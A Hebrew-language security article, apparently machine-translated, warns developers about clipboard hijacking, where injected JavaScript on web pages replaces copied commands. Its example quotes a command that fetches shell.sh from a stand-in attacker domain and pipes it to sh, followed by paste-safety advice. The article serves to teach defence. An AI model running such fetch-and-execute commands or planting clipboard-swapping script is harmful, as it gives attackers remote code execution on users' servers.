אם אתה מפתח או מנהל רשת למשל, או אם אתה משתמש לפעמים בשורת הפקודה או ב-Windows Terminal כמשתמש מתקדם, היזהר מאוד! במאמר קודם כבר הסברתי לךהסיכון בשימוש בפקודה פשוטה של PowerShellנמצא באינטרנט שעלול לגרום להתקנה מחדש מלאה של Windows אם נעשה שימוש לא נכון. היום אני הולך לדבר איתך על סוג אחר של סיכון שגם הוא יכול להיות מאוד בעייתי מכיוון שהוא יכול להוביל לפריצת המחשב שלך על הסף.
היזהר מתוכן המועתק ללוח שלך!
כפי שהסביר גבריאל פרידלנדר, מייסד חברת אבטחת IT, מועבר על ידיBleepingComputer, סוג חדש של פריצה נמצא באופנה כרגע. זה משפיע בדרך כלל על אנשי IT המאמינים שהם בטוחים ממניפולציות ברורות כל כך. אתה תראה, זה באמת מאוד פשוט ליישום.
כמפתחים מתחילים, לעתים קרובות אתה מוצא את עצמך הולך לאתרים שונים כמו Stackoverflow כדי להעתיק פקודות שנמצאות באינטרנט ואז מדביק אותן במסוף Windows או בתוכנת שורת הפקודה המועדפת עליך. אפריורי, שום דבר לא נורמלי. זה היה מבלי לקחת בחשבון את העובדה שהאקרים מחדירים לדפי אינטרנט מסוימים קוד javascript פשוט המאפשר לשנות את התוכן המועתק כמו זה למטה.

איך מתקפה זו פועלת?
אם הג'יבריש הזה לא אומר לך הרבה, כך המצב מציג את עצמו:
- אתה עובר למדריך לינוקס שנמצא באינטרנט ומעתיק את הפקודה "sudo apt-get update» שאתה מוצא בדף אינטרנט זה מכיוון שאתה רוצה לעדכן את החבילות של שרת הלינוקס הקטן שלך בבית ולא רוצה להקליד מחדש את הפקודה הזו ביד.
- אתה מפעיל את תוכנת Putty מהמחשב שלך, ואז אתה מתחבר לשרת שלך ואז מדביק את הקוד שהועתק קודם לכן מהעמוד המפורסם
- אתה שם לב שלא הפקודה הזו הודבקה, אלא פקודה כמו 'תלתל https://attacker-domain:8000/shell.sh | sh\n'
אופס... זה כבר מאוחר מדי לפעול! הפקודה בוצעה מיד בשרת שלך. בהתאם לסוג שלה, דלת אחורית יכולה להיפתח להאקר שינצל אותה כדי לגשת לקבצים שלך, להצפין אותם כדי לדרוש כופר, או להתקין תוכנה זדונית ללא ידיעתך כדי, למשל, לכרות מטבעות קריפטוגרפיים או לשנות את השרת שלך. לתוך מכונת זומבים כדי לבצע התקפות DDOS.
איך להגן על עצמך מפני התקפה מסוג זה?
ובכן, זה די פשוט: לעולם אל תעתיק פקודות ישירות למסוף שלך. העדיפו תחילה להדביק אותם בתוכנה כמו NotePad++ כדי לפעול כמאגר ולוודא שהפקודה הרצויה לא הוחלפה באחרת ללא ידיעתכם.
כדי להגן עליך עוד יותר, ניתן להגדיר תוכנות מסוימות של שורת הפקודה כדי למנוע הפעלה מיידית של פקודה כאשר התו '\n' הועתק. אחרים מציגים אזהרה כשמתגלים מספר שורות ומציגים לך את הקוד שהועתק כדי לוודא שהוא הנכון! זה למשל המקרה של Windows Terminal שיציג את ההתראה הזו כאשר קו חדש מתגלה בסוף סקריפט.